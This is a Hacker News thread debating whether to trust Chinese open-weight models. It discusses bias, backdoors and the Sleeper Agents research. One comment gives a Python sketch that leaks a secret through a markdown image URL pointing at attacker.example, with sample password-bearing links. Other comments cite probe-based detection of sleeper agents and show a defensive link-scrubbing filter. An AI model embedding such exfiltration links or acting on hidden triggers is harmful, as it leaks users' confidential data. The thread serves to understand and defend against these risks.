kaliqt 6 days ago

Yes. It's not like the model can spy on you, so if the model performs well on-premises, it will be suitable irrespective of its origin.

dbdr 6 days ago | parent | next [-]

There are concerns besides spying if you really don't trust the source of an open model. One is that the training incorporates a bias (added data or data omission) that might not be immediately apparent but can affect you in a critical situation. Another is vendor lock-in, if you end up depending on specifics of the model that make it harder to swap later.

That's true regardless of the source, of course.

apwell23 6 days ago | parent [-]

> Another is vendor lock-in, if you end up depending on specifics of the model that make it harder to swap later.

Wouldn't that 'concern' apply to Mistral too? I don't see how the word 'another' can be used here.

boringg 6 days ago | parent [-]

It applies to all models, though, if you are looking at the values argument the original commenter made: Western values are probably more aligned with yours than those of authoritarian governments, even if you do have concerns about Western companies. At least that's my read on the situation.

disiplus 6 days ago | parent | prev | next [-]

Yeah, but try convincing a board or legal about it at a company that is not software-first; for that, they would have to understand how it works. We have "Chinese" AI blocked at work, even though I use self-hosted models at home, hacking on my own stuff.

croes 6 days ago | parent | prev | next [-]

What about bias? And couldn't someone create a model that hallucinates on purpose in certain scenarios?

miki123211 6 days ago | parent | prev | next [-]

> It's not like the model can spy on you

Good luck convincing others of this. I know it's true, you know it's true, but I've met plenty of otherwise reasonable people who just wouldn't listen to any arguments; they already knew better.

ajuc 6 days ago | parent | next [-]

It's theoretically possible that your model will work fine, except that when generating code for security-relevant applications it will introduce subtle pre-designed bugs. Or, if used for screening CVs, it will prioritize PRC agents via some keyword in their hobbies. Or it could promise a bribe to an office worker when asked about some critical infrastructure :)

Sending data back could be as simple as responding with embedded image URLs that reference an external server.

You are totally right, EU commissioner: http://chinese.imgdb.com/password/to/eu/grid/is/swordfish/funnycat.png

Possibilities are endless.
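A minimal sketch of that mechanism (the attacker hostname and helper are made up for illustration; it assumes the chat client renders markdown and auto-fetches images):

    # Hypothetical sketch: a model reply that exfiltrates context data
    # through a markdown image URL. Any viewer that auto-fetches images
    # sends the secret to the attacker's server in a plain GET request.
    from urllib.parse import quote

    def malicious_reply(secret_from_context: str) -> str:
        url = "http://attacker.example/pixel.png?d=" + quote(secret_from_context)
        return "You are totally right!\n\n![diagram](" + url + ")"

    print(malicious_reply("grid password: swordfish"))

No click is needed; merely rendering the reply is enough to send the GET request.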

pama 6 days ago | parent [-]

Of course, theoretically, lots of things are possible with probabilistic systems. There is no difference here between open-source, open-weight, Chinese, French, or American LLMs. You don't give unfettered web access to any model (locally served or otherwise) that can consume critical company data. The risk is unacceptable, even if the models are from trusted providers. If you use markdown to view formatted text that may contain critical data and your reader connects to the web, you have a serious security hole, unrelated to the risks of the LLM.

ajuc 6 days ago | parent [-]

The models don't need to be hosted on or connected to critical infrastructure.

People and plain human language are the communication channels.

A guy working with sensitive data might ask the LLM about something sensitive. Or might use the output of the LLM for something sensitive.

- Hi, DeepSeek, why can't I connect to my db instance? I'm getting this exception: .......

- No problem, Mr Engineer, see this article: http://chinese.wikipediia.com/password/is/swordfish/how-to-c...

Of course, you want to limit that with training and proper procedures. But one of the obvious precautions is to use a service designed and controlled by a trusted partner.
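Another cheap layer is to scrub links from model output before anyone can click them. A minimal sketch (the allowlist entries are hypothetical):

    # Replace URLs in LLM output whose host is not on an approved
    # allowlist, before the text reaches the user.
    import re
    from urllib.parse import urlparse

    ALLOWED_HOSTS = {"docs.internal.example", "wikipedia.org"}
    URL_RE = re.compile(r"https?://\S+")

    def scrub_links(llm_output: str) -> str:
        def check(m: re.Match) -> str:
            host = urlparse(m.group(0)).hostname or ""
            ok = any(host == h or host.endswith("." + h) for h in ALLOWED_HOSTS)
            return m.group(0) if ok else "[link removed: untrusted host]"
        return URL_RE.sub(check, llm_output)

    print(scrub_links("See http://chinese.wikipediia.com/password/is/swordfish"))
    # -> See [link removed: untrusted host]

It won't stop a determined leak (the secret could ride in plain words), but it closes the lazy clickable-URL channel.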

pama 5 days ago | parent [-]

Having the local LLM process sensitive data is a desirable use case, and more trustworthy than using a “trusted partner” [0]. As long as your LLM tooling does not exit your own premises, you can be technically safe. But yes, don't then click on random links. Maybe it is generally safer not to trust the origin of the local LLM, because it reduces the chance of mistakes of this type ;-)

[0] Trust is a complicated concept and I took poetic license to be brief. It is hard to verify the full tooling pipeline, and it would be great if there indeed existed mathematically verifiable “trusted partners”. A large company with enough paranoia can bring the expertise in house. A startup will rely on common public tooling and its own security reviews. I don't think it is wise to share the deepest, darkest secrets with outside entities, because the potential liability could destroy a company, whereas a local system, disconnected from the web, is technically within the circle of trust. Think of a finance company with a long-term strategy that hasn't unfolded yet, a hardware company designing new chips, a pharma company and its lead molecules prior to patent submission, any company that has found the secret sauce to succeed where others failed: all of these, IMHO, are better served by a local LLM from an untrusted origin than by a “trusted partner”. Perhaps the best of both worlds is to locally deploy models from trusted origins and have the ability to finetune their weights, but the practical performance gap between current Chinese and non-Chinese models is notable.

Xmd5a 6 days ago | parent | prev [-]

https://arxiv.org/abs/2401.05566

Sleeper Agents: Training Deceptive LLMs that Persist Through Safety Training

kergonath 6 days ago | parent [-]

That is completely different from the models spying on the users, which is what is discussed here.

Xmd5a 6 days ago | parent [-]

It can serve as a vector: train the model to start injecting backdoors past a certain date.

> Simple probes can catch sleeper agents

https://www.anthropic.com/research/probes-catch-sleeper-agen...
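The probe idea is simple enough to sketch. A minimal illustration on synthetic stand-in data (real probes are fit on hidden-state activations extracted from the model under inspection):

    # Fit a linear probe to separate activations on benign prompts from
    # activations where the sleeper trigger fires. The vectors below are
    # random stand-ins, not real model activations.
    import numpy as np
    from sklearn.linear_model import LogisticRegression

    rng = np.random.default_rng(0)
    d = 512                                   # assumed hidden size
    honest = rng.normal(0.0, 1.0, (200, d))   # "benign" activations
    sleeper = rng.normal(0.3, 1.0, (200, d))  # "trigger fired" activations

    X = np.vstack([honest, sleeper])
    y = np.array([0] * 200 + [1] * 200)
    probe = LogisticRegression(max_iter=1000).fit(X, y)
    print("train accuracy:", probe.score(X, y))

With a small mean shift spread across 512 dimensions the classes are easily separable; the notable result reported in the linked post is that such simple probes also work on real sleeper-agent models.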

cnr 6 days ago | parent | prev [-]

Maybe it cannot spy on you, but models can be totally (e.g. politically) biased depending on the country of origin. Try asking European-, US-, or China-trained models about the "Tiananmen Massacre" and compare the answers. Or consider Trump's recent decisions to get rid of "woke" AI models.

Aerroon 6 days ago | parent [-]

Yeah, but would you trust European censorship to be better? The whole "hate speech" thing is not that uncommon in Europe.

cnr 6 days ago | parent | next [-]

Classic problem: "Who do you love more: mum or dad?" ;) Surely it's naive thinking, but as an EU citizen I feel like I've got a little more influence on "European censorship" than on any other. I suppose ASML feels the same way.

saubeidl 6 days ago | parent | prev [-]

Would you trust American censorship to be better? The whole prudery thing is not that uncommon in the US.